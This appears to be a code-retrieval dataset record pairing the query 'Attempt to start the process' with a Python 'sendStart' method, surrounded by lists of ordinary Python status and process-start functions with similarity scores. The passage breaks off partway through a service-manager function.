\"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def get_status(self):\n try:\n c = self._oc_command([\"status\"])\n o = run_cmd(c, return_output=True)\n for line in o.split('\\n'):\n logger.debug(line)\n return o\n except subprocess.CalledProcessError as ex:\n raise ConuException(\"Cannot obtain OpenShift cluster status: %s\" % ex)", "def pr_status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"pr_status\")", "def get_status(self):\n return self.status", "def get_status(self):\n return self.status", "def get_status(self):\n return self.status", "def status(self):\n try:\n if not os.path.exists( self.pidfile ): raise Exception(\"pid not exist\")\n pid = int( file_content_get(self.pidfile).strip() )\n except Exception as e:\n pid = None\n\n if not pid:\n sys.stdout.write(\"%s is not running...\\n\"%self.name)\n else:\n sys.stdout.write(\"%s is running with pid %s...\\n\"%(self.name,pid) )\n\n \n return # not an error in a restart", "def status(self):\n return self.m.status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def status(self):\n return self._status", "def getPidStatus(self, seg, pidRunningStatus):\n\n lockFileExists = pidRunningStatus['lockFileExists']\n netstatPortActive = pidRunningStatus['netstatPortActive']\n pidValue = pidRunningStatus['pidValue']\n\n lockFileName = gp.get_lockfile_name(seg.getSegmentPort())\n\n error = None\n if not lockFileExists and not netstatPortActive:\n error = \"No socket connection or lock file (%s) found for port %s\" % (lockFileName, seg.getSegmentPort())\n elif not lockFileExists and netstatPortActive:\n error = \"No lock file %s but process running on port %s\" % (lockFileName, seg.getSegmentPort())\n elif lockFileExists and not netstatPortActive:\n error = \"Have lock file %s but no process running on port %s\" % (lockFileName, seg.getSegmentPort())\n else:\n if pidValue == 0:\n error = \"Have lock file and process is active, but did not get a pid value\" # this could be an assert?\n\n res = {}\n res['pid'] = pidValue\n res['error'] = error\n return res", "def status(self):\n return self._get(path='status')", "def status(self):\n return self.get(self._names[\"status\"])", "def comando_status(self):\r\n\tif args.tipo == 'web':\r\n return self.status_web()\r\n\r\n\tif args.tipo == 'nfce':\r\n return self.consulta_status_nfce()\r\n\r\n\tif args.tipo == 'dual':\r\n return self.status_impressora_dual()", "def status(self):\n return self._query_status()['status']", "def status(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"status\")", "def getStatus(self):\n pid = self._getPid()\n if pid:\n if q.system.process.isPidAlive(pid):\n return AppStatusType.RUNNING\n return AppStatusType.HALTED", "def _CheckStatusWorkerProcess(self, pid):\n # TODO: Refactor this method, simplify and separate concerns (monitoring\n # vs management).\n self._RaiseIfNotRegistered(pid)\n\n process = self._processes_per_pid[pid]\n\n process_status = self._QueryProcessStatus(process)\n if process_status is None:\n process_is_alive = False\n else:\n process_is_alive = True\n\n process_information = self._process_information_per_pid[pid]\n used_memory = process_information.GetUsedMemory() or 0\n\n if self._worker_memory_limit and used_memory > self._worker_memory_limit:\n logger.warning((\n 'Process: {0:s} (PID: {1:d}) killed because it exceeded the '\n 'memory limit: {2:d}.').format(\n process.name, pid, self._worker_memory_limit))\n self._KillProcess(pid)\n\n if isinstance(process_status, dict):\n self._rpc_errors_per_pid[pid] = 0\n status_indicator = process_status.get('processing_status', None)\n\n else:\n rpc_errors = self._rpc_errors_per_pid.get(pid, 0) + 1\n self._rpc_errors_per_pid[pid] = rpc_errors\n\n if rpc_errors > self._MAXIMUM_RPC_ERRORS:\n process_is_alive = False\n\n if process_is_alive:\n rpc_port = process.rpc_port.value\n logger.warning((\n 'Unable to retrieve process: {0:s} (PID: {1:d}) status via '\n 'RPC socket: http://localhost:{2:d}').format(\n process.name, pid, rpc_port))\n\n processing_status_string = 'RPC error'\n status_indicator = definitions.STATUS_INDICATOR_RUNNING\n else:\n processing_status_string = 'killed'\n status_indicator = definitions.STATUS_INDICATOR_KILLED\n\n process_status = {\n 'processing_status': processing_status_string}\n\n self._UpdateProcessingStatus(pid, process_status, used_memory)\n\n # _UpdateProcessingStatus can also change the status of the worker,\n # So refresh the status if applicable.\n for worker_status in self._processing_status.workers_status:\n if worker_status.pid == pid:\n status_indicator = worker_status.status\n break\n\n if status_indicator in definitions.ERROR_STATUS_INDICATORS:\n logger.error((\n 'Process {0:s} (PID: {1:d}) is not functioning correctly. '\n 'Status code: {2!s}.').format(process.name, pid, status_indicator))\n\n self._TerminateProcessByPid(pid)\n\n replacement_process = None\n replacement_process_name = 'Worker_{0:02d}'.format(\n self._last_worker_number)\n for replacement_process_attempt in range(\n self._MAXIMUM_REPLACEMENT_RETRIES):\n logger.info((\n 'Attempt: {0:d} to start replacement worker process for '\n '{1:s}').format(replacement_process_attempt + 1, process.name))\n\n replacement_process = self._StartWorkerProcess(replacement_process_name)\n if replacement_process:\n break\n\n time.sleep(self._REPLACEMENT_WORKER_RETRY_DELAY)\n\n if not replacement_process:\n logger.error(\n 'Unable to create replacement worker process for: {0:s}'.format(\n process.name))", "def status(self):\n return self._data['status']", "def status(self):\n # process running ?\n pid = self.get_pidfile()\n \n running = True\n \n # process is not running\n if pid is None:\n running = False\n else:\n if not self.send_signal(pid,0):\n running = False\n # abnormal state, delete the file\n self.delete_pidfile()\n \n if running:\n message = \"server is running\\n\"\n else:\n message = \"server is not running\\n\"\n sys.stdout.write(message)\n \n return running", "def getStatus(self, pid = None):\n \n if pid == None:\n pid = self.getPidfile()\n \n if pid != None and q.system.process.isPidAlive(pid) == True and q.system.process.checkProcessForPid(int(pid), \"apache2\") == 0:\n return AppStatusType.RUNNING\n \n return AppStatusType.HALTED", "def status(self, *args):\n for k, v in self.processers.items():\n if v:\n if v.poll() is None:\n status = 'running'\n else:\n status = 'dead'\n else:\n status = 'stoped'\n print '%s - %s' % (k, status)", "def Status(self):\r\n\t\treturn self._get_attribute('status')", "def status(self):\n return self._dbattr('status')", "def status(self):\n\n return self._status", "def status(self):\n\n return self._status", "def status(self):\n\n return self._status", "def runtime_status(self):\n try:\n return self.yarn_api.state(self.app_id)\n except:\n return \"NONE\"" ]
[ "0.751286", "0.7507033", "0.71039456", "0.7082734", "0.70624167", "0.7023819", "0.69908047", "0.6980245", "0.69734716", "0.6922125", "0.69144756", "0.69109225", "0.6907264", "0.685191", "0.6851395", "0.68222255", "0.68154085", "0.68061125", "0.6799114", "0.6755627", "0.6755425", "0.6745426", "0.67345643", "0.6727798", "0.6727096", "0.6727096", "0.67269707", "0.6724537", "0.67141086", "0.67103297", "0.67103297", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.6702471", "0.66993225", "0.6689249", "0.66866446", "0.66866446", "0.66866446", "0.66346246", "0.66290617", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66258454", "0.66247857", "0.662288", "0.66166383", "0.66112256", "0.6607212", "0.66066587", "0.66066587", "0.66066587", "0.6589967", "0.6574808", "0.65610355", "0.6544279", "0.6530921", "0.65280676", "0.6525324", "0.65242916", "0.6522881", "0.6522881", "0.6522881", "0.65192354" ]
0.0
-1
Attempt to start the process
def sendStart (self, args) : data = streamModule.WriteBuffer() data.writeStruct('B', len(args)) for arg in args : data.writeVarLen('B', arg) return self.sendCommand("CMD_IN_DO_START", data.getvalue()).addCallback(self._sendStart_result)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Start(self):\n\n\n\n assert not self._process, 'Start() can only be called once'\n self._process = subprocess.Popen(self._args)", "def start(self):\n self._proc = self._get_subprocess()\n self._pid = self._proc.pid\n self._return_code = None", "def start(self):\r\n return self.start_subprocess()", "def start_process(options, args):\n import psutil\n import process_starter\n from synergy.system import process_helper\n\n try:\n pid = process_helper.get_process_pid(options.app)\n if pid is not None:\n if psutil.pid_exists(pid):\n message = 'ERROR: Process %r is already running with pid %r\\n' % (options.app, pid)\n sys.stderr.write(message)\n sys.exit(1)\n\n if not options.interactive:\n # this block triggers if the options.interactive is not defined or is False\n process_helper.start_process(options.app, args)\n else:\n process_starter.start_by_process_name(options.app, args)\n except Exception as e:\n sys.stderr.write('Exception on starting %s : %s \\n' % (options.app, str(e)))\n traceback.print_exc(file=sys.stderr)", "def run(self):\n self.process.start()", "def reallyStartProcess(self, name):\n if name in self.protocols:\n return\n p = self.protocols[name] = DelayedStartupLoggingProtocol()\n p.service = self\n p.name = name\n procObj, env, uid, gid = self.processes[name]\n self.timeStarted[name] = time.time()\n\n childFDs = {0: \"w\", 1: \"r\", 2: \"r\"}\n\n childFDs.update(procObj.getFileDescriptors())\n\n procObj.starting()\n\n args = procObj.getCommandLine()\n\n self._reactor.spawnProcess(\n p, args[0], args, uid=uid, gid=gid, env=env,\n childFDs=childFDs\n )", "def start(self, process_id=None):\n try:\n self.process = psutil.Process(process_id)\n logging.debug(self.process.connections())\n logging.debug(self.process.ppid())\n return \"Process Started\"\n except Exception as e:\n logging.exception(e)\n return \"Process doesnt exists\"", "def start(self) -> None:\n JavaGate().exec_process_instance(\n self._user,\n self._project,\n self.name,\n \"\",\n self.worker_group,\n self.warning_type,\n self.warning_group_id,\n 24 * 3600,\n )", "def start(self):\n control_process = mp.Process(target = self._start, args = [])\n control_process.start()", "def start():\n global running\n # os.system('python3 /Users/bowenwaugh/Documents/GA/GA_Puzzles/simple.py')\n global process\n process = Popen(['python3', '/Users/bowenwaugh/Documents/GA/GA_Puzzles/simple.py'])\n running = True", "def start_process(self, args):\n try:\n with open(os.devnull, 'w') as devnull:\n popenObj = subprocess.Popen(\n args, stdout=devnull, stderr=subprocess.PIPE, cwd=\"/tmp/\")\n popenObj.name = args\n return popenObj\n except Exception as e:\n self.logger.error(\n \"Cannot start process %s due to reason:%s\", args, e)\n raise e", "def start(self):\n if self._is_launched.is_set():\n self._log(\"warning\", \"try to start an already started process\")\n return False\n\n self._popen = Popen(shlex.split(self.command), bufsize=0, executable=None, stdin=PIPE, stdout=PIPE,\n stderr=self.stderr, close_fds=False, shell=False, cwd=None, env=None,\n universal_newlines=True, startupinfo=None, creationflags=0,\n preexec_fn=lambda: os.nice(self._priority))\n\n self._defunctdog_thread.start()\n self._stdin_thread.start()\n self._stdout_thread.start()\n register_thread(self)\n self._is_launched.set()\n self._is_running.set()", "def start(self):\n # check for running server\n if self.running():\n return False\n\n # check for creation in the meantime\n file_name = os.path.join(self.cache_dir_, MGR_PID_FILE)\n if os.path.exists(file_name):\n return\n\n # launch child process\n f = open(file_name, 'w')\n self.server_pid_ = os.fork()\n if self.server_pid_ > 0: # parent process\n # create pid file\n f.write('%d\\n' %(self.server_pid_))\n else:\n time.sleep(MGR_SLEEP_TIME)\n if not self.running():\n logging.error('Server not started. PID file did not exist')\n raise ValueError()\n self.pid_ = self.server_pid_\n logging.info('Server started with pid %d' %(self.pid_))\n self.run()", "def test_startProcessAlreadyStarted(self):\r\n self.pm.addProcess(\"foo\", [\"foo\"])\r\n self.pm.startProcess(\"foo\")\r\n self.assertIdentical(None, self.pm.startProcess(\"foo\"))", "def start(self):\n cmd = self.doCommand(self.args)\n if cmd is not None:\n cmd.join()\n else:\n self.out = self.error", "def start_bot(self):\n self.proc = subprocess.Popen(\"./start\", stdin=subprocess.PIPE,\n\t\t\t\t\t\t\t\t\t stdout=subprocess.PIPE,\n\t\t\t\t\t\t\t\t\t cwd=os.path.abspath(self.path))", "def start_process(self, connection):\n\n self.handle_process(connection)", "def _StartWorkerProcess(self, process_name):", "def start(self):\n self.p.start()", "def do_start(self, str_arg):\n try:\n # self.adbc.startActivity(validateString(str_arg))\n # the above approach failed in unittest complaining device is offline, weird...\n return self.runAdbCmd('shell am start -n', validateString(str_arg))\n except RuntimeError:\n self.resultFlag = False\n if DEBUG:\n traceback.print_exc()", "def run_starter(self, expect_to_fail=False):\n logging.info(\"running starter \" + self.name)\n args = [self.cfg.bin_dir / \"arangodb\"] + self.hotbackup_args + self.default_starter_args + self.arguments\n\n lh.log_cmd(args)\n self.instance = psutil.Popen(args)\n logging.info(\"my starter has PID:\" + str(self.instance.pid))\n if not expect_to_fail:\n self.wait_for_logfile()\n self.wait_for_port_bind()", "def spawn(self):\r\n options = self.config.options\r\n\r\n if self.pid:\r\n msg = 'process %r already running' % self.config.name\r\n options.logger.warn(msg)\r\n return\r\n\r\n self.killing = 0\r\n self.spawnerr = None\r\n self.exitstatus = None\r\n self.system_stop = 0\r\n self.administrative_stop = 0\r\n\r\n self.laststart = time.time()\r\n\r\n self._assertInState(ProcessStates.EXITED, ProcessStates.FATAL,\r\n ProcessStates.BACKOFF, ProcessStates.STOPPED)\r\n\r\n self.change_state(ProcessStates.STARTING)\r\n\r\n try:\r\n filename, argv = self.get_execv_args()\r\n except ProcessException as what:\r\n self.record_spawnerr(what.args[0])\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n return\r\n\r\n try:\r\n self.dispatchers, self.pipes = self.config.make_dispatchers(self)\r\n except OSError as why:\r\n code = why.args[0]\r\n if code == errno.EMFILE:\r\n # too many file descriptors open\r\n msg = 'too many open files to spawn %r' % self.config.name\r\n else:\r\n msg = 'unknown error: %s' % errno.errorcode.get(code, code)\r\n self.record_spawnerr(msg)\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n return\r\n\r\n try:\r\n pid = options.fork()\r\n except OSError as why:\r\n code = why.args[0]\r\n if code == errno.EAGAIN:\r\n # process table full\r\n msg = ('Too many processes in process table to spawn %r' %\r\n self.config.name)\r\n else:\r\n msg = 'unknown error: %s' % errno.errorcode.get(code, code)\r\n\r\n self.record_spawnerr(msg)\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n options.close_parent_pipes(self.pipes)\r\n options.close_child_pipes(self.pipes)\r\n return\r\n\r\n if pid != 0:\r\n return self._spawn_as_parent(pid)\r\n\r\n else:\r\n return self._spawn_as_child(filename, argv)", "def start(self):\n if self.running:\n warnings.warn(\"ExifTool already running; doing nothing.\")\n return\n with open(os.devnull, \"w\") as devnull:\n procargs = [self.executable, \"-stay_open\", \"True\", \"-@\", \"-\",\n \"-common_args\", \"-G\", \"-n\"];\n procargs.extend(self.addedargs)\n logging.debug(procargs) \n self._process = subprocess.Popen(\n procargs,\n stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=devnull)\n self.running = True", "def _start(self):\n if is_pidfile_stale(self.pidfile):\n self.pidfile.break_lock()\n\n try:\n self.daemon_context.open()\n except pidlockfile.AlreadyLocked:\n pidfile_path = self.pidfile.path\n raise DaemonRunnerStartFailureError(\n \"PID file %(pidfile_path)r already locked\" % vars())\n\n pid = os.getpid()\n message = self.start_message % vars()\n emit_message(message)\n\n self.app.run()", "def start():", "def start():", "def start():", "def start():", "def start_process(cmd, supress_output=False):\n logging.debug(cmd)\n logging.error(\"[tony]cmd:%r\" % (cmd))\n proc = subprocess.Popen(cmd, stdout=None, stderr=subprocess.PIPE)\n out, err = proc.communicate()\n rtn_code = proc.returncode\n\n if supress_output is False:\n if out:\n logging.info(out)\n if err:\n logging.error(err)\n\n if rtn_code == 0 or rtn_code is None:\n logging.info('Success: Process return code %s', str(rtn_code))\n else:\n logging.error('Error: Process return code %s', str(rtn_code))\n sys.exit(1)", "def start_process():\n global command, process\n\n def on_data(data):\n data = data.decode().strip()\n print('{}'.format(data))\n\n cmd = command.split(' ')\n\n if process:\n process.terminate()\n\n process = MySubprocess(cmd, -1, functools.partial(on_data), None, None)", "def _check_started(f):\n def inner(self, *args, **kwargs):\n if self._proc is None:\n raise ProcessIsNotStartedError('Call start() first to run the process.')\n return f(self, *args, **kwargs)\n\n return inner", "def start(self):\n if self.subcommand:\n os.execv(self.subcommand, [self.subcommand] + self.argv[1:])\n raise NoStart()\n \n if self.subapp:\n self.subapp.start()\n raise NoStart()\n \n if self.generate_config:\n self.write_default_config()\n raise NoStart()", "def start(self):\n if self._start is not None:\n raise ValueError, \"task %s already started\" % self._name\n self._start = 1\n self.run()", "def Spawn(proc):\n proc.start()\n return proc", "def start(self):\n self.__current_evaluation_context = self.agent.evaluation_context.create_child_context()\n self.current_evaluation_context.set_process(self)\n self.procedure.restart(self.__current_evaluation_context)\n self.__current_control_node = self.procedure.body\n self.__last_start_time = self.agent.evaluation_context.get_current_time()\n\n self._on_start()\n self.__state = Process.RUNNING", "def start(self):\r\n cfunc = lib_importer.windll.DAQmxStartTask\r\n if cfunc.argtypes is None:\r\n with cfunc.arglock:\r\n if cfunc.argtypes is None:\r\n cfunc.argtypes = [lib_importer.task_handle]\r\n\r\n error_code = cfunc(self._handle)\r\n check_for_error(error_code)", "def start():\n\n start_server()", "def start(self, *args):\n if args[0] == 'all':\n params = args[1:]\n for x in self.processers.keys():\n cmd = ['python', 'processmgr.py']\n cmd.append(x.replace('process', ''))\n cmd.extend(params)\n p = subprocess.Popen(cmd,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n shell=False)\n self.processers[x] = p\n print 'run %s' % x\n else:\n cmd = ['python', 'processmgr.py']\n cmd.extend(args)\n p = subprocess.Popen(cmd,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n shell=False)\n \n self.processers['process%s' % args[0]] = p\n print 'run process%s.' % args[0]", "def start(self, reload_from=None):\n assert not self._process, \"server instance already started\"\n pid = Value(\"i\")\n self._process = Process(target=self._start,\n args=(pid, socket_queue),\n kwargs={\"reload_from\": reload_from})\n self._process.start()\n pid.value = self._process.pid", "def start():\n logging.info(\"Execution Started\")", "def start_procedure(self):\n pass", "def do_start(self,processor):\n # app_logger = self.construct_logger(rta_constants.PROPERTIES_LOG_FILE)\n running_dict = {}\n for item in self.get_running_status():\n running_dict[item.get('processor')]=item.get('status')\n\n if processor == 'spark':\n if running_dict:\n if running_dict['spark<spark_worker>'] != 'Running' and running_dict['spark<spark_master>'] != 'Running':\n try:\n cmd_line = self.cmd_start_spark\n cmd = subprocess.Popen([cmd_line],shell=True,stdout=subprocess.PIPE)\n (output,err) = cmd.communicate()\n # app_logger.info('*********output logging **************')\n print(output)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['spark<spark_worker>'] == 'Running' or running_dict['spark<spark_master>'] == 'Running':\n print('Spark Server is running!! please trying to stop it before it starts.')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n return\n\n elif processor == 'tomcat':\n if running_dict.has_key('tomcat') and running_dict['tomcat'] != 'Running':\n try:\n cmd_line = self.cmd_start_tomcat\n # print('staring tomcat server------->')\n print cmd_line\n\n # 2311 Vpl update to fix problem of catalina shutdown when term exit (10.x timeout)\n cmd = subprocess.call(['nohup',cmd_line,'start'])\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n #print(output)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('tomcat'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Tomcat Server is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'HDFS':\n #1/5/2017 Commit by JOJO\n '''\n if running_dict.has_key('HDFS') and running_dict['HDFS'] != 'Running':\n try:\n cmd_line = self.cmd_start_hadoop_hdfs\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n # print(output)\n # app_logger.info('*********output logging **************')\n # print(output)\n print('HDFS has been started!')\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('HDFS'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('HDFS server is running!! please trying to stop it before it start.')\n return\n '''\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif processor == 'web_management':\n if running_dict.has_key('web_management') and running_dict['web_management'] != 'Running':\n try:\n cmd_line = 'python '+self.cmd_start_web_management\n print('starting web_management webserver------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n (output,err) = cmd.communicate()\n print(output)\n # app_logger.info('*********output logging **************')\n # print(output)\n print('web_management webserver has been started!')\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('web_management'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Flask webserver is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'novelty':\n if running_dict.has_key('novelty') and running_dict['novelty'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running':\n try:\n cmd_line = self.cmd_start_novelty_detector\n # print('staring novelty------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n print('novelty has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('novelty'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['novelty'] == 'Running':\n print('novelty processor is running!! please trying to stop it before it start.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n\n elif processor == 'raw_writer':\n if running_dict.has_key('raw_writer') and running_dict['raw_writer'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running':\n try:\n cmd_line = self.cmd_start_raw_writer\n # print('staring raw_writer------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n print('raw_writer has been started!')\n return\n\n # app_logger.info('*********output logging **************')\n # print(output)\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('raw_writer'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['raw_writer'] == 'Running':\n print('raw_writer processor is running!! please trying to stop it before it start.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n\n elif processor == 'cassandra':\n if running_dict.has_key('cassandra') and running_dict['cassandra'] != 'Running':\n try:\n cmd_line = self.cmd_start_cassandra\n # print('starting cassandra------->')\n # print cmd_line\n\n #2311 Vpl update to fix problem of cassandra shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.call(['nohup',cmd_line])\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n # print(output)\n print ('cassandra has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('cassandra'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('cassandra Server is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'kairosDb':\n if running_dict.has_key('kairosDb') and running_dict['kairosDb'] != 'Running' and running_dict['cassandra']=='Running':\n try:\n cmd_line = self.cmd_start_kairosDB\n # print('staring kairosDB------->')\n\n # print cmd_line\n\t\t\t\t\t#2311 Vpl update to fix problem of kairosDb shutdown when term exit (10.x timeout)\n\t\t\t\t\t#cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.call(['nohup',cmd_line,'start'])\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n print('kairosDb has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('kairosDb'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['cassandra']=='Stopped':\n print('cassandra required starting before kairosDb is running!! please trying to \"start cassandra\" first')\n return\n elif running_dict['kairosDB'] == 'Running':\n print('kairosDB Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'grafana':\n if running_dict.has_key('grafana') and running_dict['grafana'] != 'Running' and running_dict['kairosDb']=='Running':\n try:\n cmd_line = self.cmd_start_grafana\n # print('staring grafana------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n # app_logger.info('*********output logging **************')\n # print(output)\n print ('grafana has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('grafana'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['kairosDb']=='Stopped':\n print('kairosDb required starting before grafana is running!! please trying to \"start kairoseDb\" first')\n return\n elif running_dict['grafana'] == 'Running':\n print('grafana Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'kafka':\n if running_dict.has_key('kafka') and running_dict['kafka'] != 'Running' and running_dict['zookeeper']=='Running':\n try:\n cmd_line = self.cmd_start_kafka\n print('starting kafka------->')\n # print cmd_line\n\n #2311 Vpl update to fix problem of zookeeper shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.Popen(cmd_line)\n # (output,err) = cmd.communicate()\n # print (output)\n print ('kafka has been started!')\n return\n # app_logger.info('*********output logging **************')\n # print(output)\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('kafka'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['zookeeper']=='Stopped':\n print('zookeeper required starting before kafka is running!! please trying to \"start zookeeper\" first')\n return\n elif running_dict['kafka'] == 'Running':\n print('Kafka Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'zookeeper':\n if running_dict.has_key('zookeeper') and running_dict['zookeeper'] != 'Running':\n try:\n cmd_line = self.cmd_start_zookeeper\n # print('staring zookeeper------->')\n # print (cmd_line)\n\n #2311 Vpl update to fix problem of zookeeper shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.Popen(cmd_line)\n # (output,err) = cmd.communicate()\n # print (output)\n\n print('zookeeper has been started!')\n return\n except Exception as ex:\n print(\" Failed to stop processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('zookeeper'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Zookeeper Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'accl_processor':\n if running_dict:\n if running_dict['accl_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_accl_processor\n print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n #cmd = subprocess.Popen(['nohup',cmd_line])\n # cmd = subprocess.Popen(cmd_line)\n\n print ('Accelerometer processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['accl_processor'] == 'Running':\n print('Accelerometer processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n 